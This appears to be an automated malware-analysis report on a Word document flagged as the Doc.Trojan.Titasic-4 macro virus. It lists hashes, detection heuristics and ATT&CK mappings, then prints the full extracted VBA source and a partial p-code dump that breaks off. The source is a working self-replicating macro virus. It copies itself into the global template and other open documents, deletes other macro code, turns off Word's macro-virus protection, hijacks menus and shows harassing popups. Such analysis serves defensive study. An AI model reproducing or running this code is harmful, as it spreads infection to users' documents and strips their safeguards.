Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db0aa8ed15c2c79d…

MALICIOUS

Office (OLE)

91.0 KB Created: 2001-07-20 11:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f7b54f83f45658364ce4928e1c2601c2 SHA-1: 009f9fa5cd7efb0a5239d3d6fb72a0c7105bf7fe SHA-256: db0aa8ed15c2c79d5af91d5b1ab12da9be6810f93a48b942038ad66f45c47184
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits high-severity heuristics for legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, indicating malicious intent. ClamAV detections further confirm its malicious nature. The VBA script appears to be designed to copy itself and potentially download additional payloads, as suggested by the presence of functions like 'Mcopy' and error handling for network-related operations.

Heuristics 6

  • ClamAV: Doc.Trojan.Titasic-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Titasic-4
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38073 bytes
SHA-256: 0fa18909bc1db13cac8632339b7f3691c7b958409bf9e8673178b618921d90a5
Detection
ClamAV: Doc.Trojan.Titasic-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "eLiTe"
Public AlAsal
Public AD As Object, aDes As Variant
Public NonHaCkErS As Boolean, afound As Boolean, hapus As Boolean, reset As Boolean, aExc As Boolean, DocCount As Boolean
Function ViTJMaster()
Dim nmak(2) As String
'Dim eLiTeFoRm(0) As String
Dim NT As Object
Dim aSrc$
On Error GoTo selesai
nmak(0) = "eLiTe"
nmak(1) = "HaCkErS"
nmak(2) = "eLiTeFoRm"

aSrc = MacroContainer
Set NT = NormalTemplate
If Not DocCount Then
Set AD = ActiveDocument
ElseIf aSrc <> "SNrml.dot" Then
aSrc = NT
End If

If aSrc = NT Then
aSrc = NT.FullName: Set aDes = AD
ElseIf aSrc = AD Then
aSrc = AD.FullName: Set aDes = NT
ElseIf aSrc = "SNrml.dot" Then
Set aDes = NT
aSrc = Options.DefaultFilePath(8) & "\SNrml.src"
End If

Mhapus aDes
With aDes.VBProject
If Not (Not hapus And .Description = "eLiTe" And .VBComponents.Count > 2) Then
    Mcopy aSrc, aDes, nmak
    hapus = False
    .Description = "eLiTe"
    If aDes = NT Then
        Options.SaveInterval = 1
        CustomizationContext = NT
        CommandBars("Tools").reset
        KeyBindings.Add KeyCode:=BuildKeyCode(77, 1024), KeyCategory:=1, _
        Command:="ToolsRecordMacroStart"
        aDes.Save
    End If
    CommandBars("Macro").Controls(2).OnAction = "ViewVbCode"
Else
GoTo Aksi
End If
End With
If afound = True Then Exit Function
Refresh
On Error Resume Next
Aksi:
If aExc = True Then Exit Function
Exit Function
selesai:
If err.Number = 50289 Then MsgBox "Terimakasih Anda Telah" & Chr(13) & "Memproteksi Word dengan Aman", vbInformation, "HaCkErS"
End Function

Sub Mhapus(Sfile)
Dim nmak As Object
For Each nmak In Sfile.VBProject.VBComponents
    If nmak.Name = "NewMacros" Then NonHaCkErS = True
    If nmak.Name <> "ThisDocument" And nmak.Name <> "NewMacros" _
    And nmak.Name <> "eLiTe" And nmak.Name <> "eLiTeFoRm" _
    And nmak.Name <> "HaCkErS" Then
        hapus = True
        If reset Then
        Application.OrganizerDelete Sfile.FullName, nmak.Name, 3
        Else
        nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
        End If
    End If
Next nmak
End Sub
Sub Mcopy(Sfile, Dfile, nmak)
Dim aNmak
On Error GoTo ExitVJ
    AlAsal = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
'On Error GoTo VJ
For Each aNmak In nmak
Application.OrganizerCopy Sfile, Dfile.FullName, aNmak, 3
Next
GoTo VJ
ExitVJ:
Application.DisplayAlerts = AlAsal
End
VJ:

End Sub
Sub Action()
Documents.Add
On Error Resume Next
With ActiveWindow
.Caption = "eLiTe ThE YoUnG HaCkErS"
.ActivePane.View.Zoom.Percentage = 100
.View.FullScreen = Not .View.FullScreen
.DisplayRulers = False
.DisplayHorizontalScrollBar = False
.DisplayVerticalRuler = False
.DisplayVerticalScrollBar = False
.View.ShowTextBoundaries = False
    CommandBars("Full Screen").Position = 1
    With CommandBars("Full Screen").Controls(1)
    .Caption = "HaCkErS," & "  " & Date
    .Style = 3
    .FaceId = 281
    End With
.View.Type = 6
Randomize
With ActiveDocument.Background.Fill
    .Visible = True
    .PresetGradient Int((6 - 1 + 1) * Rnd + 1), 1, Int((24 - 1 + 1) * Rnd + 1)
End With
HaCkErS.Show
.View.FullScreen = Not .View.FullScreen
End With
CommandBars("Full Screen").reset
WBT
ActiveDocument.Close 0
WBF
eLiTeFoRm.Show
End Sub

Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
ViTJMaster
If Documents.Count > 1 Then
    For i = 1 To Documents.Count
    If Documents(i).Name <> ActiveDocument.Name Then
    Set AD = Documents(i)
    DocCount = True
    hapus = False
    ViTJMaster
    End If
    Next
End If
If Now > DateSerial(1998, 9, 15) Then Application.OnTime When:=Now + TimeValue("00:45:00"), Name:="eLiTe.Action"
End
End Sub
Sub ViTJViewVbCode()
If MsgBox("Hoi!!!...Sorry" & Chr(13) & "Apo demo nak ha...?, nak merubah, ataupun menghapus makro HaCkErS..!!Malam Sikit" & Chr(13) & Chr(13) _
& "Anda hanya boleh merekam makro, menyimpan, menggunakan" & Chr(13) & "serta menghapus makro buatan Anda" & Chr(13) & Chr(13) & " Apakah Anda ingin merekam makro..?", vbExclamation + vbYesNo, "HaCkErS") _
= vbYes Then SendKeys "%m%s{down}~%d'Macro non-HaCkErS'%m"
End Sub
Sub AutoExec()
On Error Resume Next
If MacroContainer <> NormalTemplate Then
aExc = True
ViTJMaster
WBT
AddIns.Unload False
WBF
End If
Application.EnableCancelKey = wdCancelDisabled
End Sub
Sub AutoExit()
Dim aAddin As Object
On Error GoTo batal
WBT
If Documents.Count <> 0 Then Documents.Close
Options.DefaultFilePath(2) = Options.DefaultFilePath(6)
afound = True
For Each aAddin In AddIns
    If aAddin.Name = "SNrml.dot" Then afound = False
Next aAddin
        
If afound = True Then
Application.Visible = False
Documents.Add
ViTJMaster
    With ActiveDocument
        .SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.src", FileFormat:=wdFormatDocument, AddToRecentFiles:=False
        .SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False
    End With
End If
Application.Quit
batal:
WBF
End Sub
Sub ToolsMacro()
WBF
On Error GoTo batal
Mhapus ActiveDocument
If NonHaCkErS Then
    If MacroContainer = ActiveDocument Then Application.Run NormalTemplate.VBProject.Name & ".eLiTe.ToolsMacro": Exit Sub
    Application.DisplayAlerts = 0
        With Dialogs(215)
        .Description = "Macros HaCkErS mungkin tidak bisa Anda hapus, Anda hanya bisa menghapus makro buatan Anda (Descr: 'Makro non-HaCkErS')"
        If .Display = 1 Then .Execute
        End With
    Application.DisplayAlerts = -1
Else
ViewVBCode
End If
batal:
End Sub
Sub FileTemplates()
WBF
If Not reset Then Dialogs(87).Display
End Sub
Sub FormatStyle()
WBF
Dialogs(180).Show
End Sub
Function Refresh()
reset = True
FileTemplates
Mhapus aDes
End Function
Sub AutoClose()
Application.DisplayAlerts = -1
With Options
.SaveNormalPrompt = False
.SaveInterval = 10
.VirusProtection = False
End With
If ActiveWindow.Caption <> "HaCkErS" And InStr(1, ActiveDocument.Name, "Docume", 1) = 0 _
And ActiveDocument.Name <> "SNrml.dot" Then ViTJMaster
End Sub
Sub FileExit()
AutoExit
End Sub
Sub ViTToolsOptions()
Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
Dialogs(wdDialogToolsOptions).Show
Options.DefaultFilePath(wdUserTemplatesPath) = Application.Path
End Sub
Function WBT()
WordBasic.disableautomacros True
End Function
Function WBF()
WordBasic.disableautomacros False
End Function

Sub MyAction()
On Error Resume Next
With ActiveWindow

.DisplayRulers = True
.DisplayHorizontalScrollBar = True
.DisplayVerticalRuler = True
.DisplayVerticalScrollBar = True
'.View.ShowTextBoundaries = False
End With
End Sub



Attribute VB_Name = "HaCkErS"
Attribute VB_Base = "0{75AE378A-7D13-11D5-8830-0020AFF11EF0}{75AE377B-7D13-11D5-8830-0020AFF11EF0}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False











































































































Dim Teks(4) As String
Private Sub CommandButton1_Click()
Do
    With HaCkErS
    .Height = .Height - 10
    .Width = .Width - 15
    If .Height < 25 Then Exit Do
    End With
    Beep
Loop
Unload Me
End Sub

Private Sub Image1_Click()

End Sub

Private Sub Label2_Click()

End Sub

Private Sub UserForm_Activate()
TT
End Sub
Sub TT()
Dim a As Byte, diam As Boolean
Dim tp&, tm!, sel!, i%
a = 1
diam = True
HaCkErS.Enabled = False
Do
    DoEvents
    sel = Timer - tm
    tp = tp + 1
    If tp Mod 300 = 0 Then
    Label4.ForeColor = HaCkErS.BackColor
    End If
    If tp Mod 600 = 0 Then
    Label4.ForeColor = &H80000009
End If
    If sel > 0.1 Then
        tm = Timer
        i = i + 1
        If a = 4 Then Label1.Font.Size = 14: Label1.Width = Image1.Width
        Label1.Caption = Label1.Caption & Mid(Teks(a), i, 1)
        If Mid(Teks(a), i, 1) Like "[! ]" Then Beep
            If Len(Label1.Caption) = Len(Teks(a)) Then
                If diam Then
                    Do
                    If Timer - tm > 1 Then Exit Do
                    DoEvents
                    Label4.ForeColor = HaCkErS.BackColor
                    Loop
                    diam = False
                    If a = 4 Then GoTo catat
                End If
            Label2.Move Label2.Left - 9
            If Label2.Left <= Label1.Left Then GoSub catat
        End If
    End If
Loop
Exit Sub
catat:
If a <> 5 Then Label1.Caption = ""
tm = Timer
Label2.Left = Label1.Left + Label1.Width
a = a + 1
i = 0
diam = True
        If a = 5 Then
            Label4.Visible = False
            Frame1.Visible = True
            Image1.Visible = True
            HaCkErS.Enabled = True
            CommandButton1.SetFocus
            Image1.Picture = LoadPicture(System.PrivateProfileString("", _
            "HKEY_CURRENT_USER\Control Panel\desktop", "Wallpaper"))
            Exit Sub
        End If
Return
End Sub
Private Sub UserForm_Layout()
Dim waktu%, ShOLaT$
waktu = Val(Format(Time, "hh"))
Select Case waktu
Case 12 To 14
ShOLaT = "ZOHOR"
Case 15 To 17
ShOLaT = "ASHAR"
Case 18 To 18
ShOLaT = "MAGHRIB"
Case 19 To 23
ShOLaT = "ISYAK"
Case 0 To 2
ShOLaT = "ISYA"
Case 5 To 5
ShOLaT = "SUBUH"
Case Else
Label4.Visible = False
End Select

Teks(1) = "hAi sAlaM PeRkeNaLaN DaRi eLiTe! ThE YoUnG 22 HaCkErS ..tULaH SuKa SaNgAt TenGoK CD bIrU..!"
Teks(2) = "iNgAt BiNaTaNg iNi ApO hA...!? ViReX lAh nOgOk!!! kA..Ka..kA...SeKaRaNg SaYa NaK FoRmAt HD U...!!"
Teks(3) = "Buat aWeK 'SINGLE' yang merasa dirinya CuTe & Manis.., Salam dari eLiTe..!"
Teks(4) = "hA..nAk TeNgOk FiLeM BlUe LaGi kE!..pAdAm MuKa HanG!!!..."
Label2.Left = Label1.Left + Label1.Width
Label3.Caption = "By : eLiTe '99" & Chr(13) & Chr(13) & "Thanks to : " & Chr(13) & Application.UserName
Label4.Caption = "Anda Sudah ShoLat " & ShOLaT & "!"
End Sub
Private Sub UserForm_Terminate()
    Dim i As Integer
    For i = 1 To 100
        Beep
    Next
End Sub

Attribute VB_Name = "eLiTeFoRm"
Attribute VB_Base = "0{75AE378E-7D13-11D5-8830-0020AFF11EF0}{75AE3783-7D13-11D5-8830-0020AFF11EF0}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





































' Processing file: /tmp/qstore_uj931ypf
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/eLiTe - 13258 bytes
' Line #0:
' 	Dim (Public) 
' 	VarDefn AlAsal
' Line #1:
' 	Dim (Public) 
' 	VarDefn AD (As Object)
' 	VarDefn aDes (As Variant)
' Line #2:
' 	Dim (Public) 
' 	VarDefn NonHaCkErS (As Boolean)
' 	VarDefn afound (As Boolean)
' 	VarDefn hapus (As Boolean)
' 	VarDefn reset (As Boolean)
' 	VarDefn aExc (As Boolean)
' 	VarDefn DocCount (As Boolean)
' Line #3:
' 	FuncDefn (Function ViTJMaster())
' Line #4:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0002 
' 	VarDefn nmak (As String)
' Line #5:
' 	QuoteRem 0x0000 0x001A "Dim eLiTeFoRm(0) As String"
' Line #6:
' 	Dim 
' 	VarDefn NT (As Object)
' Line #7:
' 	Dim 
' 	VarDefn aSrc
' Line #8:
' 	OnError selesai 
' Line #9:
' 	LitStr 0x0005 "eLiTe"
' 	LitDI2 0x0000 
' 	ArgsSt nmak 0x0001 
' Line #10:
' 	LitStr 0x0007 "HaCkErS"
' 	LitDI2 0x0001 
' 	ArgsSt nmak 0x0001 
' Line #11:
' 	LitStr 0x0009 "eLiTeFoRm"
' 	LitDI2 0x0002 
' 	ArgsSt nmak 0x0001 
' Line #12:
' Line #13:
' 	Ld MacroContainer 
' 	St aSrc 
' Line #14:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set NT 
' Line #15:
' 	Ld DocCount 
' 	Not 
' 	IfBlock 
' Line #16:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set AD 
' Line #17:
' 	Ld aSrc 
' 	LitStr 0x0009 "SNrml.dot"
' 	Ne 
' 	ElseIfBlock 
' Line #18:
' 	Ld NT 
' 	St aSrc 
' Line #19:
' 	EndIfBlock 
' Line #20:
' Line #21:
' 	Ld aSrc 
' 	Ld NT 
' 	Eq 
' 	IfBlock 
' Line #22:
' 	Ld NT 
' 	MemLd FullName 
' 	St aSrc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld AD 
' 	Set aDes 
' Line #23:
' 	Ld aSrc 
' 	Ld AD 
' 	Eq 
' 	ElseIfBlock 
' Line #24:
' 	Ld AD 
' 	MemLd FullName 
' 	St aSrc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NT 
' 	Set aDes 
' Line #25:
' 	Ld aSrc 
' 	LitStr 0x0009 "SNrml.dot"
' 	Eq 
' 	ElseIfBlock 
' Line #26:
' 	SetStmt 
' 	Ld NT 
' 	Set aDes 
' Line #27:
' 	LitDI2 0x0008 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	LitStr 0x000A "\SNrml.src"
' 	Concat 
' 	St aSrc 
' Line #28:
' 	EndIfBlock 
' Line #29:
' Line #30:
' 	Ld aDes 
' 	ArgsCall Mhapus 0x0001 
' Line #31:
' 	StartWithExpr 
' 	Ld aDes 
' 	MemLd VBProject 
' 	With 
' Line #32:
' 	Ld hapus 
' 	Not 
' 	MemLdWith Description 
' 	LitStr 0x0005 "eLiTe"
' 	Eq 
' 	And 
' 	MemLdWith VBComponents 
' 	MemLd Count 
' 	LitDI2 0x0002 
' 	Gt 
' 	And 
' 	Paren 
' 	Not 
' 	IfBlock 
' Line #33:
' 	Ld aSrc 
' 	Ld aDes 
' 	Ld nmak 
' 	ArgsCall Mcopy 0x0003 
' Line #34:
' 	LitVarSpecial (False)
' 	St hapus 
' Line #35:
' 	LitStr 0x0005 "eLiTe"
' 	MemStWith Description 
' Line #36:
' 	Ld aDes 
' 	Ld NT 
' 	Eq 
' 	IfBlock 
' Line #37:
' 	LitDI2 0x0001 
' 	Ld Options 
' 	MemSt SaveInterval 
' Line #38:
' 	Ld NT 
' 	St CustomizationContext 
' Line #39:
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemCall reset 0x0000 
' Line #40:
' 	LineCont 0x0004 10 00 08 00
' 	LitDI2 0x004D 
' 	LitDI2 0x0400 
' 	ArgsLd BuildKeyCode 0x0002 
' 	ParamNamed KeyCode 
' 	LitDI2 0x0001 
' 	ParamNamed KeyCategory 
' 	LitStr 0x0015 "ToolsRecordMacroStart"
' 	ParamNamed Command 
' 	Ld KeyBindings 
' 	ArgsMemCall Add 0x0003 
' Line #41:
' 	Ld aDes 
' 	ArgsMemCall Save 0x0000 
' Line #42:
' 	EndIfBlock 
' Line #43:
' 	LitStr 0x000A "ViewVbCode"
' 	LitDI2 0x0002 
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt OnAction 
' Line #44:
' 	ElseBlock 
' Line #45:
' 	GoTo Aksi 
' Line #46:
' 	EndIfBlock 
' Line #47:
' 	EndWith 
' Line #48:
' 	Ld afound 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #49:
' 	ArgsCall Refresh 0x0000 
' Line #50:
' 	OnError (Resume Next) 
' Line #51:
' 	Label Aksi 
' Line #52:
' 	Ld aExc 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #53:
' 	ExitFunc 
' Line #54:
' 	Label selesai 
' Line #55:
' 	Ld err 
' 	MemLd Number 
' 	LitDI4 0xC471 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0016 "Terimakasih Anda Telah"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x001C "Memproteksi Word dengan Aman"
' 	Concat 
' 	Ld vbInformation 
' 	LitStr 0x0007 "HaCkErS"
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #56:
' 	EndFunc 
' Line #57:
' Line #58:
' 	FuncDefn (Sub Mhapus(Sfile))
' Line #59:
' 	Dim 
' 	VarDefn nmak (As Object)
' Line #60:
' 	StartForVariable 
' 	Ld nmak 
' 	EndForVariable 
' 	Ld Sfile 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #61:
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0009 "NewMacros"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NonHaCkErS 
' 	EndIf 
' Line #62:
' 	LineCont 0x0008 0C 00 04 00 18 00 04 00
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x000C "ThisDocument"
' 	Ne 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0009 "NewMacros"
' 	Ne 
' 	And 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0005 "eLiTe"
' 	Ne 
' 	And 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0009 "eLiTeFoRm"
' 	Ne 
' 	And 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0007 "HaCkErS"
' 	Ne 
' 	And 
' 	IfBlock 
' Line #63:
' 	LitVarSpecial (True)
' 	St hapus 
' Line #64:
' 	Ld reset 
' 	IfBlock 
' Line #65:
' 	Ld Sfile 
' 	MemLd FullName 
' 	Ld nmak 
' 	MemLd New 
' 	LitDI2 0x0003 
' 	Ld Application 
' 	ArgsMemCall OrganizerDelete 0x0003 
' Line #66:
' 	ElseBlock 
' Line #67:
' 	LitDI2 0x0001 
' 	Ld nmak 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld nmak 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #68:
' 	EndIfBlock 
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	StartForVariable 
' 	Ld nmak 
' 	EndForVariable 
' 	NextVar 
' Line #71:
' 	EndSub 
' Line #72:
' 	FuncDefn (Sub Mcopy(Sfile, Dfile, nmak))
' Line #73:
' 	Dim 
' 	VarDefn aNmak
' Line #74:
' 	OnError ExitVJ 
' Line #75:
' 	Ld Application 
' 	MemLd DisplayAlerts 
' 	St AlAsal 
' Line #76:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #77:
' 	QuoteRem 0x0000 0x0010 "On Error GoTo VJ"
' Line #78:
' 	StartForVariable 
' 	Ld aNmak 
' 	EndForVariable 
' 	Ld nmak 
' 	ForEach 
' Line #79:
' 	Ld Sfile 
' 	Ld Dfile 
' 	MemLd FullName 
' 	Ld aNmak 
' 	LitDI2 0x0003 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #80:
' 	StartForVariable 
' 	Next 
' Line #81:
' 	GoTo VJ 
' Line #82:
' 	Label ExitVJ 
' Line #83:
' 	Ld AlAsal 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #84:
' 	End 
' Line #85:
' 	Label VJ 
' Line #86:
' Line #87:
' 	EndSub 
' Line #88:
' 	FuncDefn (Sub Action())
' Line #89:
' 	Ld Documents 
' 	ArgsMemCall Add 0x0000 
' Line #90:
' 	OnError (Resume Next) 
' Line #91:
' 	StartWithExpr 
' 	Ld ActiveWindow 
' 	With 
' Line #92:
' 	LitStr 0x0017 "eLiTe ThE YoUnG HaCkErS"
' 	MemStWith Caption 
' Line #93:
' 	LitDI2 0x0064 
' 	MemLdWith ActivePane 
' 	MemLd View 
' 	MemLd Zoom 
' 	MemSt Percentage 
' Line #94:
' 	MemLdWith View 
' 	MemLd FullScreen 
' 	Not 
' 	MemLdWith View 
' 	MemSt FullScreen 
' Line #95:
' 	LitVarSpecial (False)
' 	MemStWith DisplayRulers 
' Line #96:
' 	LitVarSpecial (False)
' 	MemStWith DisplayHorizontalScrollBar 
' Line #97:
' 	LitVarSpecial (False)
' 	MemStWith DisplayVerticalRuler 
' Line #98:
' 	LitVarSpecial (False)
' 	MemStWith DisplayVerticalScrollBar 
' Line #99:
' 	LitVarSpecial (False)
' 	MemLdWith View 
' 	MemSt ShowTextBoundaries 
' Line #100:
' 	LitDI2 0x0001 
' 	LitStr 0x000B "Full Screen"
' 	ArgsLd CommandBars 0x0001 
' 	MemSt Position 
' Line #101:
' 	StartWithExpr 
' 	LitDI2 0x0001 
' 	LitStr 0x000B "Full Screen"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	With 
' Line #102:
' 	LitStr 0x0008 "HaCkErS,"
' 	LitStr 0x0002 "  "
' 	Concat 
' 	Ld Date 
' 	Concat 
' 	MemStWith Caption 
' Line #103:
' 	LitDI2 0x0003 
' 	MemStWith Style 
' Line #104:
' 	LitDI2 0x0119 
' 	MemStWith FaceId 
' Line #105:
' 	EndWith 
' Line #106:
' 	LitDI2 0x0006 
' 	MemLdWith View 
' 	MemSt TypeOf 
' Line #107:
' 	ArgsCall Read 0x0000 
' Line #108:
' 	StartWithExpr 
' 	Ld ActiveDocument 
' 	MemLd Background 
' 	MemLd Fill 
' 	With 
' Line #109:
' 	LitVarSpecial (True)
' 	MemStWith Visible 
…